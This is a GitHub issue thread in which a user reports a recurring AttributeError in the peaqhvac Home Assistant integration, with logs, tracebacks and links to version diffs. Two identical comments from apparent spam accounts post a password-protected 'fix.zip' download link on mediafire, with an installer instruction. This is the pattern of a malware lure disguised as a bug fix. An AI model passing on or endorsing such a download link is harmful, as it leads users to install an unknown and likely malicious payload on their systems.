### ISSUE TITLE
Unable to handle data

### ISSUE THREAD

**Issue by enoch85** [elden1337/hass-peaqhvac#123]
```

This error originated from a custom integration.

Logger: custom_components.peaqhvac.service.hub.hub
Source: custom_components/peaqhvac/service/hub/hub.py:90
integration: peaqhvac (documentation, issues)
First occurred: 05:45:36 (361 occurrences)
Last logged: 11:41:06

Unable to handle data: sensor.temp_vardagsrum_temperature old: <state sensor.temp_vardagsrum_temperature=21.76; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP VARDAGSRUM Temperatur @ 2024-08-26T11:31:59.767009+02:00>, new: <state sensor.temp_vardagsrum_temperature=21.78; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP VARDAGSRUM Temperatur @ 2024-08-26T11:36:59.841796+02:00>. Raised expection: 'Nibe' object has no attribute 'current_offset'
Unable to handle data: sensor.temp_allrum_temperature old: <state sensor.temp_allrum_temperature=22.67; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP ALLRUM Temperatur @ 2024-08-26T11:32:05.871828+02:00>, new: <state sensor.temp_allrum_temperature=22.75; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP ALLRUM Temperatur @ 2024-08-26T11:37:05.945782+02:00>. Raised expection: 'Nibe' object has no attribute 'current_offset'
Unable to handle data: sensor.temp_groventre_temperature old: <state sensor.temp_groventre_temperature=25.32; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP GROVENTRE Temperatur @ 2024-08-26T11:32:11.654418+02:00>, new: <state sensor.temp_groventre_temperature=25.38; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP GROVENTRE Temperatur @ 2024-08-26T11:37:11.756198+02:00>. Raised expection: 'Nibe' object has no attribute 'current_offset'
Unable to handle data: sensor.temp_huvudsovrum_temperature old: <state sensor.temp_huvudsovrum_temperature=22.77; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP HUVUDSOVRUM Temperatur @ 2024-08-26T11:14:05.703670+02:00>, new: <state sensor.temp_huvudsovrum_temperature=22.99; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP HUVUDSOVRUM Temperatur @ 2024-08-26T11:37:51.385106+02:00>. Raised expection: 'Nibe' object has no attribute 'current_offset'
Unable to handle data: sensor.temp_ellas_rum_temperature old: <state sensor.temp_ellas_rum_temperature=23.1; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP ELLAS RUM Temperatur @ 2024-08-26T11:36:06.637120+02:00>, new: <state sensor.temp_ellas_rum_temperature=23.17; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP ELLAS RUM Temperatur @ 2024-08-26T11:41:06.769471+02:00>. Raised expection: 'Nibe' object has no attribute 'current_offset'
Traceback (most recent call last):
  File "/config/custom_components/peaqhvac/service/hub/hub.py", line 90, in _async_on_change
    await self.states.async_update_sensor(entity_id, new_state.state)
  File "/config/custom_components/peaqhvac/service/hub/state_changes.py", line 57, in async_update_sensor
    await self._hub.hvac.async_update_hvac()
  File "/config/custom_components/peaqhvac/service/hvac/interfaces/ihvac.py", line 112, in async_update_hvac
    await self.request_periodic_updates()
  File "/config/custom_components/peaqhvac/service/hvac/interfaces/update_system.py", line 46, in request_periodic_updates
    await self.async_update_heat()
  File "/config/custom_components/peaqhvac/service/hvac/interfaces/update_system.py", line 60, in async_update_heat
    self.update_list[HvacOperations.Offset] = self.current_offset
                                              ^^^^^^^^^^^^^^^^^^^
AttributeError: 'Nibe' object has no attribute 'current_offset'

``

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by enoch85** [comment]
@Qsgz2023ji5ban Are you a bot?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by enoch85** [comment]
Here's another one:

```
This error originated from a custom integration.

Logger: custom_components.peaqhvac.service.hub.hub
Source: custom_components/peaqhvac/service/hub/hub.py:90
integration: peaqhvac (documentation, issues)
First occurred: 16:56:18 (4 occurrences)
Last logged: 16:57:10

Unable to handle data: sensor.f750_cu_3x400v_average_outdoor_temp_bt1 old: <state sensor.f750_cu_3x400v_average_outdoor_temp_bt1=18.4; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=F750 CU 3x400V Average outdoor temp (BT1) @ 2024-08-26T16:55:08.796854+02:00>, new: <state sensor.f750_cu_3x400v_average_outdoor_temp_bt1=unavailable; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=F750 CU 3x400V Average outdoor temp (BT1) @ 2024-08-26T16:56:18.780801+02:00>. Raised expection: 'Nibe' object has no attribute 'current_offset'
Unable to handle data: sensor.temp_kok_temperature old: <state sensor.temp_kok_temperature=26.28; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP KÖK Temperatur @ 2024-08-26T16:51:45.929576+02:00>, new: <state sensor.temp_kok_temperature=26.38; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP KÖK Temperatur @ 2024-08-26T16:56:46.051605+02:00>. Raised expection: 'Nibe' object has no attribute 'current_offset'
Unable to handle data: sensor.temp_vardagsrum_temperature old: <state sensor.temp_vardagsrum_temperature=24.02; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP VARDAGSRUM Temperatur @ 2024-08-26T16:52:07.195200+02:00>, new: <state sensor.temp_vardagsrum_temperature=24.07; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP VARDAGSRUM Temperatur @ 2024-08-26T16:57:07.310445+02:00>. Raised expection: 'Nibe' object has no attribute 'current_offset'
Unable to handle data: sensor.temp_allrum_temperature old: <state sensor.temp_allrum_temperature=25.6; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP ALLRUM Temperatur @ 2024-08-26T16:52:10.157543+02:00>, new: <state sensor.temp_allrum_temperature=25.63; state_class=measurement, unit_of_measurement=°C, device_class=temperature, friendly_name=TEMP ALLRUM Temperatur @ 2024-08-26T16:57:10.266400+02:00>. Raised expection: 'Nibe' object has no attribute 'current_offset'
Traceback (most recent call last):
  File "/config/custom_components/peaqhvac/service/hub/hub.py", line 90, in _async_on_change
    await self.states.async_update_sensor(entity_id, new_state.state)
  File "/config/custom_components/peaqhvac/service/hub/state_changes.py", line 57, in async_update_sensor
    await self._hub.hvac.async_update_hvac()
  File "/config/custom_components/peaqhvac/service/hvac/interfaces/ihvac.py", line 112, in async_update_hvac
    await self.request_periodic_updates()
  File "/config/custom_components/peaqhvac/service/hvac/interfaces/update_system.py", line 46, in request_periodic_updates
    await self.async_update_heat()
  File "/config/custom_components/peaqhvac/service/hvac/interfaces/update_system.py", line 60, in async_update_heat
    self.update_list[HvacOperations.Offset] = self.current_offset
                                              ^^^^^^^^^^^^^^^^^^^
AttributeError: 'Nibe' object has no attribute 'current_offset'
``

**Comment by enoch85** [comment]
Something to do with this change?

https://github.com/elden1337/hass-peaqhvac/compare/3.0.2...3.1.0#diff-89c73bad051678187d224ff990376dd89db3b8a6150847060b124c0b45253c70L66

https://github.com/elden1337/hass-peaqhvac/compare/3.0.2...3.1.0#diff-89c73bad051678187d224ff990376dd89db3b8a6150847060b124c0b45253c70L117

https://github.com/elden1337/hass-peaqhvac/compare/3.0.2...3.1.0#diff-89c73bad051678187d224ff990376dd89db3b8a6150847060b124c0b45253c70L122

https://github.com/elden1337/hass-peaqhvac/compare/3.0.2...3.1.0#diff-89c73bad051678187d224ff990376dd89db3b8a6150847060b124c0b45253c70L132

And so on...

**Comment by enoch85** [comment]
I think this is related to https://github.com/elden1337/hass-peaqhvac/issues/124
